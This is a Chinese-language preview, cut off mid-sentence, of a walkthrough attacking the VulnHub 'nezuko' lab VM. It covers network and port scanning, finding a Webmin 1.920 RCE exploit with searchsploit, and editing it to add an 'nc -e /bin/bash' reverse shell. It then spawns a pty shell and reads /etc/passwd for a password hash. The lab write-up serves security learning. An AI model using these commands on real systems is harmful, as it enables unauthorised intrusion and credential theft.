文章预览
本周实践的是vulnhub的nezuko镜像, 下载地址,https://download.vulnhub.com/nezuko/nezuko.zip, 用virtualbox导入成功, 做地址扫描,sudo netdiscover -r 192.168.0.0/24, 获取到靶机地址是192.168.0.183, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.183, 发现靶机有13337端口的Webmin服务,版本是1.920, 查找可利用的漏洞,searchsploit Webmin 1.920, 发现个可远程代码执行的,把漏洞利用脚本复制到当前目录, 查看脚本内容,cat 47293.sh,找到可插入反弹shell命令的点, 修改脚本,vim 47293.sh, 添加反弹shell命令,nc -e /bin/bash 192.168.0.186 4444, kali攻击机上开启反弹shell监听,nc -lvp 4444, 执行漏洞利用脚本,sh 47293.sh https://192.168.0.183:13337, 获取到反弹shell,转成交互式shell, python3 -c 'import pty;pty.spawn("/bin/bash")', 查看密码文件内容,cat /etc/passwd, 获取到zenitsu账户的hash密码, 添加到文
………………………………